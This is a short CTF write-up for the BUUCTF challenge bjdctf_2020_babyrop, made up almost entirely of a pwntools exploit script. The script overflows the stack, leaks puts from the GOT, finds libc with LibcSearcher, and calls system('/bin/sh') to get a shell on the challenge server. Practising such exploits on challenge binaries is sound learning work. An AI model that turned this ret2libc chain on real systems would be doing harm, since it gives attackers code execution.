buuctf bjdctf_2020_babyrop

常规libc 64位

from pwn import *
from LibcSearcher import * 

local_file  = './bjdctf_2020_babyrop'
# libc paths are kept for the commented-out ELF(...) fallback below; the live
# script resolves libc through LibcSearcher instead.
local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
remote_libc = './libc-2.23.so'


# 0 -> run the binary locally, anything else -> talk to the remote service.
select = 1

if select == 0:
    r = process(local_file)
else:
    r = remote('node3.buuoj.cn', 25895)
#libc = ELF(local_libc)
#libc = ELF(remote_libc)

# Parsed binary: supplies GOT/PLT/symbol addresses and the arch for pwntools.
elf = ELF(local_file)

# Verbose tube logging (every send/recv is printed); arch follows the ELF header.
context.log_level = 'debug'
context.arch = elf.arch

# Short-hand wrappers around the tube `r` used by the exploit body below.
def se(data):
    """Send raw data."""
    return r.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return r.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return r.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return r.sendlineafter(delim, data)

# Same operation as sa(); kept under both names.
sea = sa

def rc(numb=4096):
    """Receive up to *numb* bytes."""
    return r.recv(numb)

def rl():
    """Receive one line."""
    return r.recvline()

def ru(delims, drop=True):
    """Receive until *delims*; *drop* strips the delimiter itself."""
    return r.recvuntil(delims, drop)

# NOTE(review): the pad is a str literal, so these two assume str-typed tube
# data (Python 2 pwntools); under Python 3 bytes.ljust() needs a bytes fill.
def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it as a little-endian u32."""
    return u32(data.ljust(4, '\0'))

def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it as a little-endian u64."""
    return u64(data.ljust(8, '\0'))

def info_addr(tag, addr):
    """Log *addr* in hex under the label *tag*."""
    return r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live tube *r*, running *cmd* as the attach script."""
    gdb.attach(r, cmd)

# Gadget and symbol addresses, used as absolute values: the script relies on
# the binary being loaded at its link address (no PIE).
pop_rdi = 0x0000000000400733 # pop rdi ; ret
#pop_rsi = 0x0000000000400731 # pop rsi pop r15 ; ret
#s = 0x400790
fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']

# Bytes between the start of the overflowed buffer and the saved return
# address: 0x20 of buffer followed by 8 bytes of saved rbp.
padding = 'a'*0x20 + 'b'*0x8

# Stage 1: puts(puts@GOT) prints the resolved libc address of puts, then the
# chain returns to main so the same overflow can be used a second time.
p1 = flat([padding, pop_rdi, fun_got, fun_plt, main])
sla('story!\n',p1)
#fun_addr = uu64(ru('\x7f')[-6:])
# A 64-bit userland pointer has 6 significant bytes ending in 0x7f; take the
# last six bytes up to that marker and zero-extend to a full qword.
leaked = r.recvuntil('\x7f')[-6:]
fun_addr = u64(leaked.ljust(8, '\x00'))
log.info(hex(fun_addr))

# Identify the libc build from the leaked puts address and derive the base.
libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

# Stage 2: system("/bin/sh"); 0xdeadbeef is the (never meaningfully used)
# return address sitting after the call.
p2 = flat([padding, pop_rdi, binsh_addr, system_addr, 0xdeadbeef])
sla('story!\n',p2)



r.interactive()
